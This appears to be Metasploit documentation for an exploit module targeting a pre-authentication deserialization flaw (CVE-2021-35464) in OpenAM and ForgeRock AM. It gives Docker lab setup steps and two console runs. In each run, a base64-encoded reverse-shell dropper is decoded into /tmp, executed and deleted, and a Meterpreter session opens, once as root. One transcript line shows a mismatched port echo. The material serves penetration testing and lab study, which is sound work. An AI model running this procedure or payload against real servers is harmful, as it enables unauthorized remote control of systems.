## Vulnerable Application
OpenAM versions 7 and later are not affected. A patch is available that can be applied for OpenAM version 6.

### Description

This module leverages a pre-authentication remote code execution vulnerability in the OpenAM identity and access
management solution. The vulnerability arises from a Java deserialization flaw in OpenAM’s implementation of the Jato
framework and can be triggered by a simple one-line GET or POST request to a vulnerable endpoint. Successful
exploitation yields code execution on the target system as the service user.

This vulnerability also affects the ForgeRock identity platform which is built on top of OpenAM and is thus
is susceptible to the same issue.

### Installation

#### OpenAM 14.6.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7

*This maps TCP port 7080 to the containers port 8080.*

1. `sudo docker run -h localhost -p 7080:8080 --name openam openidentityplatform/openam:14.6.3`
1. Navigate to http://<ip_address>:7080/openam
1. Click `Create New Configuration`, not `Create Default Configuration`, as automatic configuration appears to fail.
1. Except where otherwise noted, use the default configuration values and set password fields where required.
    1. In Step 3, set the ports to the following values
        * DIRECTORY_ADMIN_PORT = 4444
        * DIRECTORY_JMX_PORT = 1689
        * DIRECTORY_PORT = 50389
    1. In Step 4, select "OpenAM User Data Store"

#### ForgeRock with Docker

*This assumes that the ForgeRock `AM-6.5.3.war` file is available for deployment.*

1. Rename or copy `AM-6.5.3.war` to `openam.war`
1. In the same directory as the `openam.war` file, create a `Dockerfile` with the following contents:

    ```
    FROM tomcat:8.5.3-jre8

    MAINTAINER metasploit

    COPY openam.war /usr/local/tomcat/webapps/
    ```

1. Build the docker image using `docker build . -t forgerock`
1. Run the container using `docker container run -it --publish 8080:8080 forgerock`
1. Navigate to http://<ip_address>:8080/openam
1. Follow the default configuration steps.

## Verification Steps

1. Follow the OpenAM instructions listed above to install OpenAM
1. Follow the `ForgeRock with Docker` instructions above to install ForgeRock.
1. Do: `use exploit/multi/http/cve_2021_35464_forgerock_openam`
1. Do: `set RHOST <ip>`
1. Do: `set LHOST <ip>`
1. Do: `set LPORT <port>`
1. Do: `run`
1. You should get a Meterpreter session.

## Scenarios

#### OpenAM 14.6.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7
```
msf6 > use exploit/multi/http/cve_2021_35464_forgerock_openam
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set LHOST docker0
LHOST => 172.18.0.1
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RPORT 7080
RPORT => 7080
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options

Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      7080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                         machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /openam          yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > check
[*] 127.0.0.1:7080 - The target appears to be vulnerable.
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[+] Successfully executed command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwSAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/YmhYe.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/wucGF' < '/tmp/YmhYe.b64' ; chmod +x '/tmp/wucGF' ; '/tmp/wucGF' ; rm -f '/tmp/wucGF' ; rm -f '/tmp/YmhYe.b64'
[*] Sending stage (3012548 bytes) to 172.18.0.2
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 1 opened (172.18.0.1:4444 -> 172.18.0.2:52990) at 2021-07-09 16:15:05 -0500

meterpreter > getuid
Server username: openam @ localhost (uid=1001, gid=0, euid=1001, egid=0)
meterpreter > shell
Process 490 created.
Channel 1 created.
pwd
/usr/local/tomcat
^Z
Background channel 1? [y/N]  y
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 10.9 (Linux 5.8.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```

### ForgeRock AM 6.5.3 on Ubuntu 20.04.2 x64 with Docker version 20.10.7
```
msf6 > use exploit/multi/http/cve_2021_35464_forgerock_openam
[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set LHOST docker0
LHOST => 172.18.0.1
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RHOST 127.0.0.1
RHOST => 127.0.0.1
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > set RPORT 8080
RPORT => 7080
msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > show options

Module options (exploit/multi/http/cve_2021_35464_forgerock_openam):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     127.0.0.1        yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      8080             yes       The target port (TCP)
   SRVHOST    0.0.0.0          yes       The local host or network interface to listen on. This must be an address on the local
                                         machine or 0.0.0.0 to listen on all addresses.
   SRVPORT    8080             yes       The local port to listen on.
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   SSLCert                     no        Path to a custom SSL certificate (default is randomly generated)
   TARGETURI  /openam          yes       Base path
   URIPATH                     no        The URI to use for this exploit (default is random)
   VHOST                       no        HTTP server virtual host


Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  172.18.0.1       yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   1   Linux Dropper


msf6 exploit(multi/http/cve_2021_35464_forgerock_openam) > exploit

[*] Started reverse TCP handler on 172.18.0.1:4444
[*] Executing automatic check (disable AutoCheck to override)
[+] The target appears to be vulnerable.
[*] Executing Linux Dropper for linux/x64/meterpreter/reverse_tcp
[+] Successfully executed command: echo -n f0VMRgIBAQAAAAAAAAAAAAIAPgABAAAAeABAAAAAAABAAAAAAAAAAAAAAAAAAAAAAAAAAEAAOAABAAAAAAAAAAEAAAAHAAAAAAAAAAAAAAAAAEAAAAAAAAAAQAAAAAAA+gAAAAAAAAB8AQAAAAAAAAAQAAAAAAAASDH/aglYmbYQSInWTTHJaiJBWrIHDwVIhcB4UWoKQVlQailYmWoCX2oBXg8FSIXAeDtIl0i5AgARXKwSAAFRSInmahBaaipYDwVZSIXAeSVJ/8l0GFdqI1hqAGoFSInnSDH2DwVZWV9IhcB5x2o8WGoBXw8FXmp+Wg8FSIXAeO3/5g==>>'/tmp/rxeJM.b64' ; ((which base64 >&2 && base64 -d -) || (which base64 >&2 && base64 --decode -) || (which openssl >&2 && openssl enc -d -A -base64 -in /dev/stdin) || (which python >&2 && python -c 'import sys, base64; print base64.standard_b64decode(sys.stdin.read());') || (which perl >&2 && perl -MMIME::Base64 -ne 'print decode_base64($_)')) 2> /dev/null > '/tmp/drsZI' < '/tmp/rxeJM.b64' ; chmod +x '/tmp/drsZI' ; '/tmp/drsZI' ; rm -f '/tmp/drsZI' ; rm -f '/tmp/rxeJM.b64'
[*] Sending stage (3012548 bytes) to 172.18.0.2
[*] Command Stager progress - 100.00% done (823/823 bytes)
[*] Meterpreter session 2 opened (172.18.0.1:4444 -> 172.18.0.2:53510) at 2021-07-09 16:37:32 -0500

meterpreter > getuid
Server username: root @ 731c8d4b9b26 (uid=0, gid=0, euid=0, egid=0)
meterpreter > sysinfo
Computer     : 172.18.0.2
OS           : Debian 8.5 (Linux 5.8.0-59-generic)
Architecture : x64
BuildTuple   : x86_64-linux-musl
Meterpreter  : x64/linux
meterpreter >
```